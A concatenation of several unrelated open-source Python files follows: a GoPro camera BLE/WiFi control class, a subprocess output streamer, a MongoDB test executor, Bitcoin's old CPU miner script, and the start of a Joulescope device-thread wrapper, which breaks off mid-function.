return self._wifi.is_connected
@property
def is_encoding(self) -> bool:
"""Is the camera currently encoding?
Returns:
bool: True if yes, False if no
"""
if not self._maintain_ble:
raise InvalidConfiguration("Not maintaining BLE state so encoding is not applicable")
return self._internal_state & GoPro._InternalState.ENCODING == 1
@property
def is_busy(self) -> bool:
"""Is the camera currently performing a task that prevents it from accepting commands?
Returns:
bool: True if yes, False if no
"""
if not self._maintain_ble:
raise InvalidConfiguration("Not maintaining BLE state so busy is not applicable")
return self._internal_state & GoPro._InternalState.SYSTEM_BUSY == 1
@property
def version(self) -> float:
"""The API version does the connected camera supports
Only 2.0 is currently supported
Returns:
float: supported version in decimal form
"""
return float(self._api.version)
@property
def ble_command(self) -> BleCommands:
"""Used to call the version-specific BLE commands
Returns:
BleCommands: the commands
"""
return self._api.ble_command
@property
def ble_setting(self) -> BleSettings:
"""Used to access the version-specific BLE settings
Returns:
BleSettings: the settings
"""
return self._api.ble_setting
@property
def ble_status(self) -> BleStatuses:
"""Used to access the version-specific BLE statuses
Returns:
BleStatuses: the statuses
"""
return self._api.ble_status
@property
def wifi_command(self) -> WifiCommands:
"""Used to access the version-specific Wifi commands
Returns:
WifiCommands: the commands
"""
return self._api.wifi_command
@property
def wifi_setting(self) -> WifiSettings:
"""Used to access the version-specific Wifi settings
Returns:
WifiSettings: the settings
"""
return self._api.wifi_setting
def open(self, timeout: int = 10, retries: int = 5) -> None:
"""Perform all initialization commands for ble and wifi
For BLE: scan and find device, establish connection, discover characteristics, configure queries
start maintenance, and get Open GoPro version..
For Wifi: discover SSID and password, enable and connect. Or disable if not using.
Raises:
Any exceptions during opening are propagated through
Args:
timeout (int, optional): How long to wait for each connection before timing out. Defaults to 10.
retries (int, optional): How many connection attempts before considering connection failed. Defaults to 5.
"""
try:
# Establish BLE connection and start maintenance threads if desired
self._open_ble(timeout, retries)
# Find and configure API version
version = self.ble_command.get_open_gopro_api_version().flatten
version_str = f"{version.major}.{version.minor}"
if version_str != "2.0":
raise InvalidOpenGoProVersion(version)
logger.info(f"Using Open GoPro API version {version_str}")
# Establish Wifi connection if desired
if self._enable_wifi_during_init:
self._open_wifi(timeout, retries)
else:
# Otherwise, turn off Wifi
logger.info("Turning off the camera's Wifi radio")
self.ble_command.enable_wifi_ap(False)
except Exception as e:
logger.error(f"Error while opening: {e}")
self.close()
raise e
def close(self) -> None:
"""Safely stop the GoPro instance.
This will disconnect BLE and WiFI if applicable.
If not using the context manager, it is mandatory to call this before exiting the program in order to
prevent reconnection issues because the OS has never disconnected from the previous session.
"""
self._close_wifi()
self._close_ble()
@ensure_initialized(Interface.BLE)
def get_update(self, timeout: float = None) -> GoProResp:
"""Get a notification that we received from a registered listener.
If timeout is None, this will block until a notification is received.
The updates are received via FIFO
Args:
timeout (float, optional): Time to wait for a notification before returning. Defaults to None (wait forever)
Returns:
GoProResp: Received notification
"""
return self._out_q.get(timeout=timeout)
@ensure_initialized(Interface.BLE)
def keep_alive(self) -> bool:
"""Send a heartbeat to prevent the BLE connection from dropping.
This is sent automatically by the GoPro instance if its `maintain_ble` argument is not False.
Returns:
bool: True if it succeeded,. False otherwise
"""
return self.ble_setting.led.set(Params.LED.BLE_KEEP_ALIVE).is_ok
##########################################################################################################
# End Public API
##########################################################################################################
@property
def _is_ble_initialized(self) -> bool:
"""Are we done
Returns:
bool: True if yes, False if no
"""
return self._threads_waiting == 0
def _maintain_state(self) -> None:
"""Thread to keep track of ready / encoding and acquire / release ready semaphore."""
self._ready.acquire()
while self.is_ble_connected:
internal_status_previous = self._internal_state
with self._state_condition:
self._state_condition.wait()
# If we were ready but not now we're not, acquire the semaphore
if internal_status_previous == 0 and self._internal_state != 0:
logger.trace("Control acquiring semaphore") # type: ignore
self._ready.acquire()
logger.trace("Control has semaphore") # type: ignore
# If we weren't ready but now we are, release the semaphore
elif internal_status_previous != 0 and self._internal_state == 0:
# If this is the first time, mark that we might now be initialized
if not self._is_ble_initialized:
self._threads_waiting -= 1
self._ready.release()
logger.trace("Control released semaphore") # type: ignore
self._threads_waiting += 1
logger.debug("Maintain state thread exiting...")
def _periodic_keep_alive(self) -> None:
"""Thread to periodically send the keep alive message via BLE."""
while self.is_ble_connected:
if not self._is_ble_initialized:
self._threads_waiting -= 1
try:
if self.keep_alive():
time.sleep(KEEP_ALIVE_INTERVAL)
except Exception: # pylint: disable=broad-except
# If the connection disconnects while we were trying to send, there can be any number
# of exceptions. This is expected and this thread will exit on the next while check.
pass
self._threads_waiting += 1
logger.debug("periodic keep alive thread exiting...")
def _register_listener(self, producer: ProducerType) -> None:
"""Register a producer to store notifications from.
The notifications can be accessed via the get_update() method.
Args:
producer (ProducerType): Producer to listen to.
"""
self._listeners[producer] = True
def _unregister_listener(self, producer: ProducerType) -> None:
"""Unregister a producer in order to stop listening to its notifications.
Args:
producer (ProducerType): Producer to stop listening to.
"""
if producer in self._listeners:
del self._listeners[producer]
def _open_ble(self, timeout: int = 10, retries: int = 5) -> None:
"""Connect the instance to a device via BLE.
Args:
device (BleDevice): Device to connect to
timeout (int, optional): Time in seconds before considering establishment failed. Defaults to 10 seconds.
retries (int, optional): How many tries to reconnect after failures. Defaults to 5.
Raises:
ConnectFailed: Connection could not be established
"""
# Establish connection, pair, etc.
self._ble.open(timeout, retries)
# Configure threads if desired
if self._maintain_ble:
self._state_thread.start()
self.ble_status.encoding_active.register_value_update()
self.ble_status.system_ready.register_value_update()
self._keep_alive_thread.start()
logger.info("BLE is ready!")
# TODO refactor this into smaller methods
def _notification_handler(self, handle: int, data: bytearray) -> None:
"""Receive notifications from the BLE controller.
Args:
handle (int): Attribute handle that notification was received on.
data (bytes): Bytestream that was received.
"""
# Responses we don't care about. For now, just the BLE-spec defined battery characteristic
if (uuid := self._ble.gatt_db.handle2uuid(handle)) == GoProUUIDs.BATT_LEVEL:
return
logger.debug(f'Received response on BleUUID [{uuid}]: {data.hex(":")}')
# Add to response dict if not already there
if uuid not in self._active_resp:
self._active_resp[uuid] = GoProResp(self._parser_map, meta=[uuid])
self._active_resp[uuid]._accumulate(data)
if self._active_resp[uuid].is_received:
response = self._active_resp[uuid]
response._parse()
# Handle internal statuses
if self._maintain_ble:
if (
response.cmd
in [
QueryCmdId.REG_STATUS_VAL_UPDATE,
QueryCmdId.GET_STATUS_VAL,
QueryCmdId.STATUS_VAL_PUSH,
]
and StatusId.ENCODING in response.data
):
with self._state_condition:
if response[StatusId.ENCODING] is True:
self._internal_state |= GoPro._InternalState.ENCODING
else:
self._internal_state &= ~GoPro._InternalState.ENCODING
self._state_condition.notify()
if (
response.cmd
in [
QueryCmdId.REG_STATUS_VAL_UPDATE,
QueryCmdId.GET_STATUS_VAL,
QueryCmdId.STATUS_VAL_PUSH,
]
and StatusId.SYSTEM_READY in response.data
):
with self._state_condition:
if response[StatusId.SYSTEM_READY] is True:
self._internal_state &= ~GoPro._InternalState.SYSTEM_BUSY
else:
self._internal_state |= GoPro._InternalState.SYSTEM_BUSY
self._state_condition.notify()
# Check if this is the awaited synchronous response (id matches). Note! these have to come in order.
response_claimed = False
if not self._sync_resp_wait_q.empty():
queue_snapshot = self._sync_resp_wait_q.snapshot()
if queue_snapshot[0].id is response.id:
# Dequeue it and put this on the ready queue
self._sync_resp_wait_q.get_nowait()
self._sync_resp_ready_q.put(response)
response_claimed = True
# If this wasn't the awaited synchronous response...
if not response_claimed:
logger.info(build_log_rx_str(response, asynchronous=True))
# See if there are any registered responses that need to be enqueued for client consumption
for key in list(response.data.keys()):
if (response.cmd, key) not in self._listeners:
del response.data[key]
# Enqueue the response if there is anything left
if len(response.data) > 0:
self._out_q.put(response)
# Clear active response from response dict
del self._active_resp[uuid]
def _close_ble(self) -> None:
if self.is_ble_connected and self._ble is not None:
# Clear the disconnect event handler to allow disconnect handler to pass and reset
self._ble_disconnect_event.clear()
self._ble.close()
# This waits on the disconnect handler to reset the disconnection event
self._ble_disconnect_event.wait()
def _disconnect_handler(self, _: Any) -> None:
"""Handle disconnects"""
if self._ble_disconnect_event.is_set():
raise ConnectionTerminated("BLE connection terminated unexpectedly.")
self._ble_disconnect_event.set()
# TODO refactor to allow use of semaphore decorator which will require a state table for commands/ responses
@ensure_initialized(Interface.BLE)
def _write_characteristic_receive_notification(self, uuid: BleUUID, data: bytearray) -> GoProResp:
"""Perform a BLE write and wait for a corresponding notification response.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's API delegate (i.e. self)
Args:
uuid (BleUUID): BleUUID to write to
data (bytearray): data to write
Raises:
Exception: Unexpected functionality occurred
Returns:
GoProResp: parsed notification response data
"""
assert self._ble is not None
# Acquire ready semaphore unless we are initializing or this is a Set Shutter Off command
have_semaphore = False
if (
self._maintain_ble
and self._is_ble_initialized
and not (
GoProResp._from_write_command(self._parser_map, uuid, data).id is CmdId.SET_SHUTTER
and data[-1] == 0
)
):
logger.trace( # type: ignore
f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} acquiring semaphore"
)
self._ready.acquire()
logger.trace(f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} has semaphore") # type: ignore
have_semaphore = True
# Store information on the response we are expecting
self._sync_resp_wait_q.put(GoProResp._from_write_command(self._parser_map, uuid, data))
# Perform write
logger.debug(f"Writing to [{uuid.name}] UUID: {data.hex(':')}")
self._ble.write(uuid, data)
# Wait to be notified that response was received
try:
response: GoProResp = self._sync_resp_ready_q.get(timeout=WRITE_TIMEOUT)
except queue.Empty as e:
logger.error(f"Response timeout of {WRITE_TIMEOUT} seconds!")
raise ResponseTimeout(WRITE_TIMEOUT) from e
# Check status
if not response.is_ok:
logger.warning(f"Received non-success status: {response.status}")
if self._maintain_ble:
# If this was set shutter on, we need to wait to be notified that encoding has started
if response.cmd is CmdId.SET_SHUTTER and data[-1] == 1:
while not self.is_encoding:
# We don't want to use the application's loop, can't use any of our loops due to potential deadlock,
# and don't want to spawn a new thread for this. So just poll ¯\_(ツ)_/¯
# A read to an int is atomic anyway.
time.sleep(0.1)
# Release the semaphore if we acquired it
if have_semaphore:
self._ready.release()
logger.trace( # type: ignore
f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} released the semaphore"
)
return response
@ensure_initialized(Interface.BLE)
@acquire_ready_semaphore
def _read_characteristic(self, uuid: BleUUID) -> GoProResp:
"""Read a characteristic's data by GoProUUIDs.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's delegates (i.e. self.command, self.setting, self.ble_status)
Args:
uuid (BleUUID): characteristic data to read
Returns:
bytearray: read data
"""
received_data = self._ble.read(uuid)
logger.debug(f"Reading from {uuid.name}")
return GoProResp._from_read_response(self._parser_map, uuid, received_data)
@ensure_initialized(Interface.BLE)
def _open_wifi(self, timeout: int = 15, retries: int = 5) -> None:
"""Connect to a GoPro device via Wifi.
Args:
enable (bool): whether to enable or disable wifi
timeout (int, optional): Time before considering establishment failed. Defaults to 15 seconds.
retries (int, optional): How many tries to reconnect after failures. Defaults to 5.
Raises:
Exception: Wifi failed to connect.
"""
logger.info("Discovering Wifi AP info and enabling via BLE")
password = self.ble_command.get_wifi_password().flatten
ssid = self.ble_command.get_wifi_ssid().flatten
self.ble_command.enable_wifi_ap(True)
self._wifi.open(ssid, password, timeout, retries)
def _close_wifi(self) -> None:
"""Terminate the Wifi connection."""
if hasattr(self, "_wifi"): # Corner case where instantication fails before superclass is initialized
self._wifi.close()
@ensure_initialized(Interface.WIFI)
@acquire_ready_semaphore
def _get(self, url: str) -> GoProResp:
"""Send an HTTP GET request to an Open GoPro endpoint.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's delegates (i.e. self.wifi_command and self.wifi_status)
Args:
url (str): endpoint URL
Returns:
GoProResp: response
"""
if not self.is_wifi_connected:
raise GoProNotInitialized("WiFi is not connected.")
url = GoPro._base_url + url
logger.debug(f"Sending: {url}")
response: Optional[GoProResp] = None
for retry in range(HTTP_GET_RETRIES):
try:
request = requests.get(url, timeout=GET_TIMEOUT)
request.raise_for_status()
response = GoProResp._from_http_response(self._parser_map, request)
break
except requests.exceptions.HTTPError as e:
# The camera responded with an error. Break since we successfully sent the command and attempt
# to continue
logger.warning(e)
response = GoProResp._from_http_response(self._parser_map, e.response)
break
except requests.exceptions.ConnectionError as e:
logger.warning(repr(e))
logger.warning("Retrying to send the command...")
if retry == HTTP_GET_RETRIES - 1:
raise ResponseTimeout(HTTP_GET_RETRIES) from e
assert response is not None
return response
@ensure_initialized(Interface.WIFI)
@acquire_ready_semaphore
def _stream_to_file(self, url: str, file: Path) -> None:
"""Send an HTTP GET request to an Open GoPro endpoint to download a binary file.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's delegates (i.e. self.wifi_command and self.wifi_status)
Args:
url (str): endpoint URL
file (Path): location where file should be downloaded to
"""
assert self.is_wifi_connected
url = GoPro._base_url + url
logger.debug(f"Sending: {url}")
with requests.get(url, stream=True) as request:
request.raise_for_status()
with open(file, "wb") as f:
logger.debug(f"receiving stream to {file}...")
for chunk in request.iter_content(chunk_size=8192):
f.write(chunk)
|
proc.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2017 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' proc.py: subprocess and subprocess's stdout/stderr management '''
from threading import Thread
def _stream_process_fileno(fileno, handler):
""" Stream handling each line from fileno
:param filno: file object
:param handler: a function that will be called for each line from fileno
:return: None
"""
while 1:
line = fileno.readline()
handler(line)
if not line:
break
def stream_process_stdout(process, handler):
""" Stream the stdout for a process out to display
:param process: the process to stream the stdout for
:param handler: a function that will be called for each stdout line
:return: None
"""
_stream_process_fileno(process.stdout, handler)
def stream_process_stderr(process, handler):
""" Stream the stderr for a process out to display
:param process: the process to stream the stderr for
:param handler: a function that will be called for each stderr line
:return: None
"""
_stream_process_fileno(process.stderr, handler)
def _async_stream_process_output(process, stream_fn, handler):
""" Stream and handle the output of a process
:param process: the process to stream the output for
:param stream_fn: the function that applies handler to process
:param handler: a function that will be called for each log line
:return: None
"""
logging_thread = Thread(target=stream_fn, args=(process, handler, ))
# Setting the logging thread as a daemon thread will allow it to exit with the program
# rather than blocking the exit waiting for it to be handled manually.
logging_thread.daemon = True
logging_thread.start()
return logging_thread
def async_stream_process_stdout(process, handler):
""" Stream and handler the stdout of a process
:param process: the process to stream the stdout for
:param handler: a function that will be called to handle each line
:return: None
"""
return _async_stream_process_output(process, stream_process_stdout, handler)
def async_stream_process_stderr(process, handler):
""" Stream and handler the stderr of a process
:param process: the process to stream the stderr for
:param handler: a function that will be called to handle each line
:return: None
"""
return _async_stream_process_output(process, stream_process_stderr, handler)
class StringBuilder(object):
def __init__(self):
self.end = False
self.strs = []
def add(self, line):
if not line:
self.end = True
else:
self.strs.append(line)
def result(self):
while True:
if self.end:
return ''.join(self.strs)
else:
continue
def async_stdout_builder(proc):
""" Save stdout into string builder
:param proc: the process to save stdout for
:return StringBuilder
"""
stdout_builder = StringBuilder()
async_stream_process_stdout(proc, stdout_builder.add)
return stdout_builder
def async_stderr_builder(proc):
""" Save stderr into string builder
:param proc: the process to save stderr for
:return StringBuilder
"""
stderr_builder = StringBuilder()
async_stream_process_stderr(proc, stderr_builder.add)
return stderr_builder
def async_stdout_stderr_builder(proc):
""" Save stdout and stderr into string builders
:param proc: the process to save stdout and stderr for
:return (StringBuilder, StringBuilder)
"""
return async_stdout_builder(proc), async_stderr_builder(proc)
|
executor.py | """
Driver of the test execution framework.
"""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import logging
from .. import utils
from ..utils import queue as _queue
class TestGroupExecutor(object):
"""
Executes a test group.
Responsible for setting up and tearing down the fixtures that the
tests execute against.
"""
_TIMEOUT = 24 * 60 * 60 # =1 day (a long time to have tests run)
def __init__(self,
exec_logger,
test_group,
logging_config,
config=None,
fixture=None,
hooks=None):
"""
Initializes the TestGroupExecutor with the test group to run.
"""
# Build a logger for executing this group of tests.
logger_name = "%s:%s" % (exec_logger.name, test_group.test_kind)
self.logger = logging.loggers.new_logger(logger_name, parent=exec_logger)
self.logging_config = logging_config
self.fixture_config = fixture
self.hooks_config = utils.default_if_none(hooks, [])
self.test_config = utils.default_if_none(config, {})
self._test_group = test_group
self._using_buildlogger = logging.config.using_buildlogger(logging_config)
self._build_config = None
if self._using_buildlogger:
self._build_config = logging.buildlogger.get_config()
# Must be done after getting buildlogger configuration.
self._jobs = [self._make_job(job_num) for job_num in xrange(_config.JOBS)]
def run(self):
"""
Executes the test group.
Any exceptions that occur during setting up or tearing down a
fixture are propagated.
"""
self.logger.info("Starting execution of %ss...", self._test_group.test_kind)
return_code = 0
try:
if not self._setup_fixtures():
return_code = 2
return
num_repeats = _config.REPEAT
while num_repeats > 0:
test_queue = self._make_test_queue()
self._test_group.record_start()
(report, interrupted) = self._run_tests(test_queue)
self._test_group.record_end(report)
# If the user triggered a KeyboardInterrupt, then we should stop.
if interrupted:
raise errors.UserInterrupt("Received interrupt from user")
sb = [] # String builder.
self._test_group.summarize_latest(sb)
self.logger.info("Summary: %s", "\n ".join(sb))
if not report.wasSuccessful():
return_code = 1
if _config.FAIL_FAST:
break
# Clear the report so it can be reused for the next execution.
for job in self._jobs:
job.report.reset()
num_repeats -= 1
finally:
if not self._teardown_fixtures():
return_code = 2
self._test_group.return_code = return_code
def _setup_fixtures(self):
"""
Sets up a fixture for each job.
"""
for job in self._jobs:
try:
job.fixture.setup()
except:
self.logger.exception("Encountered an error while setting up %s.", job.fixture)
return False
# Once they have all been started, wait for them to become available.
for job in self._jobs:
try:
job.fixture.await_ready()
except:
self.logger.exception("Encountered an error while waiting for %s to be ready",
job.fixture)
return False
return True
def _run_tests(self, test_queue):
"""
Starts a thread for each Job instance and blocks until all of
the tests are run.
Returns a (combined report, user interrupted) pair, where the
report contains the status and timing information of tests run
by all of the threads.
"""
threads = []
interrupt_flag = threading.Event()
user_interrupted = False
try:
# Run each Job instance in its own thread.
for job in self._jobs:
t = threading.Thread(target=job, args=(test_queue, interrupt_flag))
# Do not wait for tests to finish executing if interrupted by the user.
t.daemon = True
t.start()
threads.append(t)
# SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
# are many of them. Both the 5 and the 10 are arbitrary.
if len(threads) >= 5:
time.sleep(10)
joined = False
while not joined:
# Need to pass a timeout to join() so that KeyboardInterrupt exceptions
# are propagated.
joined = test_queue.join(TestGroupExecutor._TIMEOUT)
except (KeyboardInterrupt, SystemExit):
interrupt_flag.set()
user_interrupted = True
else:
# Only wait for all the Job instances if not interrupted by the user.
for t in threads:
t.join()
reports = [job.report for job in self._jobs]
combined_report = _report.TestReport.combine(*reports)
# We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
# instance if a test fails and it decides to drain the queue. We only want to raise a
# StopExecution exception in TestGroupExecutor.run() if the user triggered the interrupt.
return (combined_report, user_interrupted)
def _teardown_fixtures(self):
"""
Tears down all of the fixtures.
Returns true if all fixtures were torn down successfully, and
false otherwise.
"""
success = True
for job in self._jobs:
try:
if not job.fixture.teardown():
self.logger.warn("Teardown of %s was not successful.", job.fixture)
success = False
except:
self.logger.exception("Encountered an error while tearing down %s.", job.fixture)
success = False
return success
def _get_build_id(self, job_num):
"""
Returns a unique build id for a job.
"""
build_config = self._build_config
if self._using_buildlogger:
# Use a distinct "builder" for each job in order to separate their logs.
if build_config is not None and "builder" in build_config:
build_config = build_config.copy()
build_config["builder"] = "%s_job%d" % (build_config["builder"], job_num)
build_id = logging.buildlogger.new_build_id(build_config)
if build_config is None or build_id is None:
self.logger.info("Encountered an error configuring buildlogger for job #%d, falling"
" back to stderr.", job_num)
return build_id, build_config
return None, build_config
def _make_fixture(self, job_num, build_id, build_config):
"""
Creates a fixture for a job.
"""
fixture_config = {}
fixture_class = fixtures.NOOP_FIXTURE_CLASS
if self.fixture_config is not None:
fixture_config = self.fixture_config.copy()
fixture_class = fixture_config.pop("class")
logger_name = "%s:job%d" % (fixture_class, job_num)
logger = logging.loggers.new_logger(logger_name, parent=logging.loggers.FIXTURE)
logging.config.apply_buildlogger_global_handler(logger,
self.logging_config,
build_id=build_id,
build_config=build_config)
return fixtures.make_fixture(fixture_class, logger, job_num, **fixture_config)
def _make_hooks(self, job_num, fixture):
"""
Creates the custom behaviors for the job's fixture.
"""
behaviors = []
for behavior_config in self.hooks_config:
behavior_config = behavior_config.copy()
behavior_class = behavior_config.pop("class")
logger_name = "%s:job%d" % (behavior_class, job_num)
logger = logging.loggers.new_logger(logger_name, parent=self.logger)
behavior = _hooks.make_custom_behavior(behavior_class,
logger,
fixture,
**behavior_config)
behaviors.append(behavior)
return behaviors
def _make_job(self, job_num):
"""
Returns a Job instance with its own fixture, hooks, and test
report.
"""
build_id, build_config = self._get_build_id(job_num)
fixture = self._make_fixture(job_num, build_id, build_config)
hooks = self._make_hooks(job_num, fixture)
logger_name = "%s:job%d" % (self.logger.name, job_num)
logger = logging.loggers.new_logger(logger_name, parent=self.logger)
if build_id is not None:
endpoint = logging.buildlogger.APPEND_GLOBAL_LOGS_ENDPOINT % {"build_id": build_id}
url = "%s/%s/" % (_config.BUILDLOGGER_URL.rstrip("/"), endpoint.strip("/"))
logger.info("Writing output of job #%d to %s.", job_num, url)
report = _report.TestReport(logger,
self.logging_config,
build_id=build_id,
build_config=build_config)
return _job.Job(logger, fixture, hooks, report)
def _make_test_queue(self):
"""
Returns a queue of TestCase instances.
Use a multi-consumer queue instead of a unittest.TestSuite so
that the test cases can be dispatched to multiple threads.
"""
test_kind_logger = logging.loggers.new_logger(self._test_group.test_kind,
parent=logging.loggers.TESTS)
# Put all the test cases in a queue.
queue = _queue.Queue()
for test_name in self._test_group.tests:
test_case = testcases.make_test_case(self._test_group.test_kind,
test_kind_logger,
test_name,
**self.test_config)
queue.put(test_case)
# Add sentinel value for each job to indicate when there are no more items to process.
for _ in xrange(_config.JOBS):
queue.put(None)
return queue
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
device_thread.py | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Threaded wrapper for the device API.
"""
import threading
import queue
import logging
from joulescope.usb.api import DeviceDriverApi
log = logging.getLogger(__name__)
TIMEOUT = 3.0
TIMEOUT_OPEN = 10.0
def _queue_empty(q):
while True:
try:
q.get(timeout=0.0)
except queue.Empty:
break
class DeviceThread:
"""Wrap a :class:`Device` in a thread.
This class implements the Device API and simply wraps a Device
implementation so that it runs in its own thread.
"""
def __init__(self, usb_device: DeviceDriverApi):
self._device = usb_device
self._cmd_queue = queue.Queue() # tuples of (command, args, callback)
self._signal_queue = queue.Queue()
self._response_queue = queue.Queue()
self._thread = None
self._closing = False
self._str = None
self.counter = 0
def _cmd_process(self, cmd, args, cbk):
delegate_cbk = False
rv = None
try:
log.debug('_cmd_process %s - start', cmd)
if cmd == 'status':
rv = self._device.status()
elif cmd == 'open':
event_callback_fn = args
rv = self._device.open(event_callback_fn)
elif cmd == 'close':
rv = self._device.close()
elif cmd == 'control_transfer_out':
delegate_cbk = True
args, kwargs = args
self._device.control_transfer_out(cbk, *args, **kwargs)
elif cmd == 'control_transfer_in':
delegate_cbk = True
args, kwargs = args
self._device.control_transfer_in(cbk, *args, **kwargs)
elif cmd == 'read_stream_start':
args, kwargs = args
rv = self._device.read_stream_start(*args, **kwargs)
elif cmd == 'read_stream_stop':
args, kwargs = args
